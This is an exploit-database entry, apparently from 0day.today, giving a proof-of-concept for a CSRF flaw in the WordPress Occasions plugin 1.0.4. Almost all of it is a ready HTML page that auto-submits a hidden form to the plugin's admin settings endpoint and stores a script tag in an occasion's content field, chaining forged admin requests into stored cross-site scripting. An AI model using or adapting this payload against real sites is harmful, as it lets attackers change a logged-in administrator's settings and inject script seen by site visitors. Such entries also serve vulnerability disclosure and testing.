id: 20524
date: 03/19/2013
title: WordPress Occasions Plugin 1.0.4 - CSRF Vulnerability
author: m3tamantra
cves: 

<head><title>CSRF Occasions</title></head>
<body>
    <!-- replace 127.0.0.1:9001/wordpress -->
    <form action="http://127.0.0.1:9001/wordpress/wp-admin/options-general.php?page=occasions/occasions.php" method="POST">
        <input type="hidden" name="action" value="saveoccasions" />
        <input type="hidden" name="nodes[]" value="1" />
        <input type="hidden" name="occ_title1" value="CSRF Vulnerability" />
        <input type="hidden" name="occ_startdate1" value="18.03." />
        <input type="hidden" name="occ_enddate1" value="28.03." />
        <input type="hidden" name="occ_type1" value="1" />
        <input type="hidden" name="occ_content1" value="<script>alert(1)</script>" />
        <script>document.forms[0].submit();</script>
    </form>
</body>
</html>

#  0day.today [2023-03-25]  #